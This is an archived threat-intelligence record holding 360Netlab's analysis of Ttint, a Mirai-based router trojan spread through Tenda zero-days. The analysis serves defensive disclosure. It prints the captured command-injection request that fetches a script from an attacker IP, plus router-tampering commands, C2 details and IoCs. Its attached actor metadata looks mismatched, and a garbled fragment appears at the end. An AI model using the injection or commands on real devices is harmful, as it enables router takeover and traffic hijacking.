{
	"id": "396074f5-ac8a-4220-b656-da6f4bbf0f02",
	"created_at": "2026-04-06T00:07:09.109187Z",
	"updated_at": "2026-04-10T03:31:18.908285Z",
	"deleted_at": null,
	"sha1_hash": "67df0bb004e8920cf60690a2e992597b85aabb69",
	"title": "Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 786680,
	"plain_text": "Ttint: An IoT Remote Access Trojan spread through 2 0-day\r\nvulnerabilities\r\nBy Alex.Turing\r\nPublished: 2020-10-01 · Archived: 2026-04-05 13:33:02 UTC\r\nAuthor: Lingming Tu, Yanlong Ma, Genshen Ye\r\nBackground introduction\r\nStarting from November 2019, 360Netlab Anglerfish system have successively monitored attacker using two\r\nTenda router 0-day vulnerabilities to spread a Remote Access Trojan (RAT) based on Mirai code.\r\nThe conventional Mirai variants normally focus on DDoS, but this variant is different. In addition to DDoS\r\nattacks, it implements 12 remote access functions such as Socket5 proxy for router devices, tampering with router\r\nDNS, setting iptables, executing custom system commands.\r\nIn addition, at the C2 communication level, it uses the WSS (WebSocket over TLS) protocol. Doing this can\r\ncircumvent the typical Mirai traffic detection at the traffic level, and it also provides secure encrypted\r\ncommunication for C2.\r\nAbout the infrastructure, the attacker first used a Google cloud service IP, and then switched to a hosting provider\r\nin Hong Kong. When we looked up the website certificate, sample, domain name and IP in our DNSmon system\r\nLater, we were able to see more infrastructure IPs, samples, and more C2 domain names.\r\nTwo zero days, 12 remote access functions for the router, encrypted traffic protocol, and infrastructure IP that that\r\nmoves around. This botnet does not seem to be a very typical player.\r\nWe named this botnet Ttint.\r\n0-day vulnerability attack\r\nOn November 9, 2019, we detected that the attacker used the first Tenda router 0-day vulnerability (CVE-2018-\r\n14558 \u0026 CVE-2020-10987) to spread Ttint samples. It is worth noting that this vulnerability was not disclosed\r\nuntil July 10, 2020[1].\r\nGET /goform/setUsbUnload/.js?deviceName=A;cd%20/tmp%3Brm%20get.sh%3Bwget%20http%3A//34.92.139.186%3A5001/bot/ge\r\nHost: {target}\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.22.0\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 1 of 11\n\nOn August 21, 2020, we saw the second Tenda router 0-day vulnerability being used to spread Ttint samples.\r\nOn August 28, 2020, we reported the details of the second 0-day vulnerability and the PoC to the router\r\nmanufacturer Tenda via email, but the manufacturer has not yet responded.\r\n0-day vulnerability scope\r\nWe have found the following Tenda router firmwares were affected via the 360 FirmwareTotal system.\r\nUS_AC9V1.0BR_V15.03.05.14_multi_TD01\r\nUS_AC9V1.0BR_V15.03.05.16_multi_TRU01\r\nUS_AC9V1.0BR_V15.03.2.10_multi_TD01\r\nUS_AC9V1.0BR_V15.03.2.13_multi_TD01\r\nUS_AC9V1.0BR_V15.03.2.13_multi_TDE01\r\nUS_AC9V3.0RTL_V15.03.06.42_multi_TD01\r\nUS_AC10UV1.0RTL_V15.03.06.48_multi_TDE01\r\nUS_AC15V1.0BR_V15.03.05.18_multi_TD01\r\nUS_AC15V1.0BR_V15.03.05.19_multi_TD01\r\nUS_AC15V1.0BR_V15.03.1.8_EN_TDEUS\r\nUS_AC15V1.0BR_V15.03.1.10_EN_TDC+TDEUS\r\nUS_AC15V1.0BR_V15.03.1.10_EN_TDCTDEUS\r\nUS_AC15V1.0BR_V15.03.1.12_multi_TD01\r\nUS_AC15V1.0BR_V15.03.1.16_multi_TD01\r\nUS_AC15V1.0BR_V15.03.1.17_multi_TD01\r\nUS_AC18V1.0BR_V15.03.05.05_multi_TD01\r\nUS_AC18V1.0BR_V15.03.3.6_multi_TD01\r\nUS_AC18V1.0BR_V15.03.3.10_multi_TD01\r\nac9_kf_V15.03.05.19(6318_)_cn\r\nac18_kf_V15.03.05.19(6318_)_cn\r\nWe also looked up in the 360 Quake cyberspace surveying and mapping system, and the following is a result.\r\nTtint overview\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 2 of 11\n\nTtint is a remote access Trojan based on Mirai code for router devices. In addition to multiplexing 10 Mirai DDoS\r\nattack instructions, it also implements 12 control instructions.\r\nWe analyzed and compared Ttint samples in the two periods and found that their C2 instructions were exactly the\r\nsame, but they had some differences in the 0-day vulnerability, XOR Key, and C2 protocol used.\r\nReverse analysis\r\nGenerally speaking, at the host level, Ttint's behavior is relatively simple. When running, it deletes its own files,\r\nmanipulates the watchdog, and prevents the device from restarting, it runs as a single instance by binding the port;\r\nthen modifies the process name to confuse the user; it finally establishes a connection with the decrypted C2 ,\r\nReporting device information, waiting for C2 to issue instructions, and execute corresponding attacks or custom\r\nfunctions.\r\nWe can see that it retains a large number of mirai features, such as single instance, random process name, sensitive\r\nconfiguration information encryption, integration of a large number of attack vectors, etc.;\r\nThere are changes though, most notable, it rewrites the network communication part to use websocket protocol .\r\nLet’s take a look at some of the custom functions.\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 3 of 11\n\nTtint v2 sample analysis\r\nMD5:73ffd45ab46415b41831faee138f306e\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nLib:uclib\r\nSocket5 proxy\r\nBy binding the specific port issued by C2 to enable Socket5 proxy service. The attacker can remotely access the\r\nrouter's intranet, doing intranet roaming.\r\nTampering with router DNS\r\nTamper the router DNS by modifying the resolv.conf file,\r\necho nameserver \"DNS server\" \u003e /etc/etc/resolv.conf\r\nThe result of this is that the author of Ttint can hijack any network access of users under the affected routing\r\ndevice to possibly monitor or steal sensitive information.\r\nConfig iptables\r\nBy setting iptables up, traffic forwarding and target address conversion can be easily achieved. .The following\r\nconfig is to expose the internal network services to the public network.\r\niptables -t nat -A PREROUTING -d \"\" -p tcp --dport \"\" -j DNAT --to-destination \"\"\r\niptables -t nat -A POSTROUTING -d \"\" -p tcp --dport \"\" -j SNAT \"\"\r\niptables -A FORWARD -d -j ACCEPT\r\nReverse shell\r\nBy implementing a reverse shell through socket, the author of Ttint can operate the shell of the affected routing\r\ndevice as a local shell.\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 4 of 11\n\nSelf-upgrade\r\nThe bot can download corresponding CPU architecture from the specified Download URL (default is\r\nuhyg8v.notepod2.com:5001 ) to update itself.\r\nSelf-exit\r\nTtint implements a single instance by binding port 57322, by killing the process using this port, it can exit itself.\r\nHidden network channel\r\nBy using the nc tool to monitor a specific port issued by C2, communication between the Ttint author and the\r\naffected routing device can be established. (The meaning of the -d parameter is \"Detach from stdin\", so we\r\nspeculate that there is a redirection instruction after PORT)\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 5 of 11\n\nnc -d -l \"PORT\" \"some redirect cmd\"\r\nReport device information\r\nReport the time, os, cpu, ip, version, and mac information of the device to C2, but there is a bug in the format\r\nstring in the sample, and an \"\u0026\" character is missing in the type=back_infoatk_id=%s\u0026time=\u0026os=\r\nExecute system commands\r\nExecute custom system commands issued by C2 through popen function\r\nC2 protocol analysis\r\nThe C2 information of the Ttint Bot sample is encrypted and stored in the configuration information table in the\r\nMirai format. The XOR Key is 0x0EDFCEBDA\r\nc2 ciphertxt:\r\n51 19 55 56 56 45 59 50 49 62 0E 4E 4F 54 45 50 4F 44 12 0E 43 4F 4D 20\r\nc2 plaintxt:\r\nq9uvveypiB.notepod2.com\r\nWhen the bot is running, it decrypts to obtain the C2 address ws:q9uvveypiB.notepod2.com:443 , and then\r\ncommunicates with C2 securely through the WebSocket over TLS protocol.\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 6 of 11\n\nWebSocket protocol\r\nWhen Ttint C2 replies to the Bot with a response code of 101, it means that the protocol handshake is completed,\r\nand then the Bot can communicate using the WebSocket protocol. The following is an example of a WebSocket\r\npacket after TLS decryption.\r\nBot's “go live” packet\r\nAccording to the WebSocket protocol, we know that the payload length is 0x81, the mask is 0xD5F39E67, and the\r\npayload data address is 0x08~0x88.\r\n00000000: 81 FE 00 81 D5 F3 9E 67 A1 8A EE 02 E8 91 FF 04 .......g........\r\n00000010: BE AC F7 09 B3 9C B8 06 A1 98 C1 0E B1 CE AE 41 ...............A\r\n00000020: A1 9A F3 02 E8 D5 F1 14 E8 BF F7 09 A0 8B BE 53 ...............S\r\n00000030: FB C2 AB 49 E5 DE AA 55 F8 94 FB 09 B0 81 F7 04 ...I...U........\r\n00000040: F3 90 EE 12 E8 9A A8 5F E3 D5 F7 17 E8 C2 A7 55 ......._.......U\r\n00000050: FB C2 A8 5F FB C1 AC 55 FB C2 AC 5F F3 85 FB 15 ..._...U..._....\r\n00000060: A6 9A F1 09 E8 C6 FD 02 E5 91 A9 04 E7 D5 FF 15 ................\r\n00000070: B2 80 A3 41 B8 92 FD 5A E5 C3 A4 57 B6 C9 AC 5E ...A...Z...W...^\r\n00000080: EF C4 F8 5D E7 C7 A4 5E E7\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 7 of 11\n\nPerform XOR calculation on Payload Data with mask, and get the payload in plain text, which is exactly the Bot's\r\n“go live” packet.\r\n00000000 74 79 70 65 3d 62 61 63 6b 5f 69 6e 66 6f 26 61 |type=back_info\u0026a|\r\n00000010 74 6b 5f 69 64 3d 30 26 74 69 6d 65 3d 26 6f 73 |tk_id=0\u0026time=\u0026os|\r\n00000020 3d 4c 69 6e 75 78 20 34 2e 31 35 2e 30 2d 34 32 |=Linux 4.15.0-42|\r\n00000030 2d 67 65 6e 65 72 69 63 26 63 70 75 3d 69 36 38 |-generic\u0026cpu=i68|\r\n00000040 36 26 69 70 3d 31 39 32 2e 31 36 38 2e 32 32 32 |6\u0026ip=192.168.222|\r\n00000050 2e 31 32 38 26 76 65 72 73 69 6f 6e 3d 35 63 65 |.128\u0026version=5ce|\r\n00000060 30 62 37 63 32 26 61 72 67 73 3d 26 6d 61 63 3d |0b7c2\u0026args=\u0026mac=|\r\n00000070 30 30 3a 30 63 3a 32 39 3a 37 66 3a 32 34 3a 39 |00:0c:29:7f:24:9|\r\n00000080 32\r\nC2 instruction\r\nAll together, Ttint Bot supports 22 kinds of C2 commands, the 10 DDoS commands are from Mirai , and the rest\r\n12 are new.\r\nid instruction\r\n0 attack_udp_generic\r\n1 attack_udp_vse\r\n2 attack_udp_dns\r\n9 attack_udp_plain\r\n3 attack_tcp_flag\r\n4 attack_tcp_pack\r\n5 attack_tcp_xmas\r\n6 attack_grep_ip\r\n7 attack_grep_eth\r\n10 attack_app_http\r\n12 run \"nc\" command\r\n13 run \"ls\" command\r\n15 Execute system commands\r\n16 Tampering with router DNS\r\n18 Report device information\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 8 of 11\n\nid instruction\r\n14 Config iptables\r\n11 run \"ifconfig\" command\r\n17 Self-exit\r\n19 Open Socks5 proxy\r\n20 Close Socks5 proxy\r\n21 Self-upgrade\r\n22 Reverse shell\r\nC2 command format analysis\r\nWe captured the following commands the C2 sent to the bots.\r\n00000000: 00 55 00 00 00 0A 0F 01 00 00 00 00 20 02 1A 13 .U.......... ...\r\n00000010: 70 70 2D 6C 4F 76 32 78 39 6E 31 33 58 73 5A 30 pp-lOv2x9n13XsZ0\r\n00000020: 77 76 44 1B 30 69 70 74 61 62 6C 65 73 20 2D 44 wvD.0iptables -D\r\n00000030: 20 49 4E 50 55 54 20 2D 70 20 74 63 70 20 2D 2D INPUT -p tcp --\r\n00000040: 64 70 6F 72 74 20 35 32 36 38 35 20 2D 6A 20 41 dport 52685 -j A\r\n00000050: 43 43 45 50 54 CCEPT\r\nThe following is a breakdown for the format\r\n00 55 ---- msg length\r\n0F ---- cmd id, here is \"run system cmd\"\r\n02 ---- option number\r\n1A ---- option type, here is \"attack id\"\r\n13 ---- option length, length of \"pp-lOv2x9n13XsZ0wvD\" = 0x13\r\n1B ---- option type, here is \"attack cmd buf\"\r\n30 ---- option length\r\nGenerally speaking, Ttint will combine multiple custom functions to achieve specific attack goals.\r\nTake the two adjacent commands we captured, the first command is\r\niptables -I INPUT -p tcp --dport 51599 -j ACCEPT , to allow access to port 51599 of the affected device.\r\n00000000: 82 55 00 55 00 00 00 0A 0F 01 00 00 00 00 20 02 .U.U.......... .\r\n00000010: 1A 13 70 70 2D 51 77 76 73 59 59 45 45 4D 70 36 ..pp-QwvsYYEEMp6\r\n00000020: 77 49 31 62 43 1B 30 69 70 74 61 62 6C 65 73 20 wI1bC.0iptables\r\n00000030: 2D 49 20 49 4E 50 55 54 20 2D 70 20 74 63 70 20 -I INPUT -p tcp\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 9 of 11\n\n00000040: 2D 2D 64 70 6F 72 74 20 35 31 35 39 39 20 2D 6A --dport 51599 -j\r\n00000050: 20 41 43 43 45 50 54 ACCEPT\r\nThe next command is to enable the Socket5 proxy function on port 51599 of the affected device.\r\n00000000: 82 3C 00 3C 00 00 00 0A 13 01 00 00 00 00 20 04 .\u003c.\u003c.......... .\r\n00000010: 1C 05 35 31 35 39 39 1D 06 61 6D 68 78 65 66 1E ..51599..amhxef.\r\n00000020: 08 64 40 61 59 79 31 39 52 1A 13 70 70 2D 30 58 .d@aYy19R..pp-0X\r\n00000030: 74 79 73 61 33 79 58 4D 51 59 6E 6C 41 72 tysa3yXMQYnlAr\r\nThe combination of the two commands enabled and allowed the attacker to use the Socket5 proxy.\r\nRecommendations\r\nWe recommend that Tenda router users check their firmware and make necessary update.\r\nWe also recommend that our readers monitor and block related IoCs.\r\nContact us\r\nInterested readers can contact us on twitter or via email netlab[at]360.cn .\r\nIoC\r\nIP:\r\n34.92.85.21 Hong Kong ASN15169 GOOGLE\r\n34.92.139.186 Hong Kong ASN15169 GOOGLE\r\n43.249.29.56 Hong Kong ASN133115 HK Kwaifong Group Limited\r\n45.249.92.60 Hong Kong ASN133115 HK Kwaifong Group Limited\r\n45.249.92.72 Hong Kong ASN133115 HK Kwaifong Group Limited\r\n103.60.220.48 Hong Kong ASN133115 HK Kwaifong Group Limited\r\n103.108.142.92 Hong Kong ASN133115 HK Kwaifong Group Limited\r\n103.243.183.248 Hong Kong ASN133115 HK Kwaifong Group Limited\r\nC2:\r\ncnc.notepod2.com:23231\r\nback.notepod2.com:80\r\nq9uvveypiB.notepod2.com:443\r\nUpdate Server:\r\nuhyg8v.notepod2.com:5001\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 10 of 11\n\nURL:\r\nhttp://45.112.205.60/td.sh\r\nhttp://45.112.205.60/ttint.i686\r\nhttp://45.112.205.60/ttint.arm5el\r\nhttp://45.112.205.60/ttint.mipsel\r\nhttp://34.92.139.186:5001/bot/get.sh\r\nhttp://34.92.139.186:5001/bot/ttint.mipsel\r\nhttp://34.92.139.186:5001/bot/ttint.x86_64\r\nMD5:\r\n3e6a16bcf7a9e9e0be25ae28551150f5\r\n4ee942a0153ed74eb9a98f7ad321ec97\r\n6bff8b6fd606e795385b84437d1e1e0a\r\n733f71eb6cfca905e8904d0fb785fb43\r\na89cefdf71f2fced35fba8612ad07174\r\nc5cb2b438ba6d809f1f71c776376d293\r\ncfc0f745941ce1ec024cb86b1fd244f3\r\n73ffd45ab46415b41831faee138f306e\r\nSource: https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 11 of 11\n\nAccording payload data to the WebSocket address is protocol, 0x08~0x88. we know that the payload length is 0x81, the mask is 0xD5F39E67, and the\n00000000: 81 FE 00 81 D5 F3 9E 67 A1 8A EE 02 E8 91 FF 04 .......g........\n00000010: BE AC F7 09 B3 9C B8 06 A1 98 C1 0E B1 CE AE 41 ...............A\n00000020: A1 9A F3 02 E8 D5 F1 14 E8 BF F7 09 A0 8B BE 53 ...............S\n00000030: FB C2 AB 49 E5 DE AA 55 F8 94 FB 09 B0 81 F7 04 ...I...U........\n00000040: F3 90 EE 12 E8 9A A8 5F E3 D5 F7 17 E8 C2 A7 55 ......._.......U\n00000050: FB C2 A8 5F FB C1 AC 55 FB C2 AC 5F F3 85 FB 15 ..._...U..._....\n00000060: A6 9A F1 09 E8 C6 FD 02 E5 91 A9 04 E7 D5 FF 15 ................\n00000070: B2 80 A3 41 B8 92 FD 5A E5 C3 A4 57 B6 C9 AC 5E ...A...Z...W...^\n00000080: EF C4 F8 5D E7 C7 A4 5E E7 \n    Page 7 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/"
	],
	"report_names": [
		"ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities"
	],
	"threat_actors": [
		{
			"id": "67bf0462-41a3-4da5-b876-187e9ef7c375",
			"created_at": "2022-10-25T16:07:23.44832Z",
			"updated_at": "2026-04-10T02:00:04.607111Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"Careto",
				"The Mask",
				"Ugly Face"
			],
			"source_name": "ETDA:Careto",
			"tools": [
				"Careto"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f5bf6853-3f6e-452c-a7b7-8f81c9a27476",
			"created_at": "2023-01-06T13:46:38.677391Z",
			"updated_at": "2026-04-10T02:00:03.064818Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"The Mask",
				"Ugly Face"
			],
			"source_name": "MISPGALAXY:Careto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434029,
	"ts_updated_at": 1775791878,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/67df0bb004e8920cf60690a2e992597b85aabb69.pdf",
		"text": "https://archive.orkl.eu/67df0bb004e8920cf60690a2e992597b85aabb69.txt",
		"img": "https://archive.orkl.eu/67df0bb004e8920cf60690a2e992597b85aabb69.jpg"
	}
}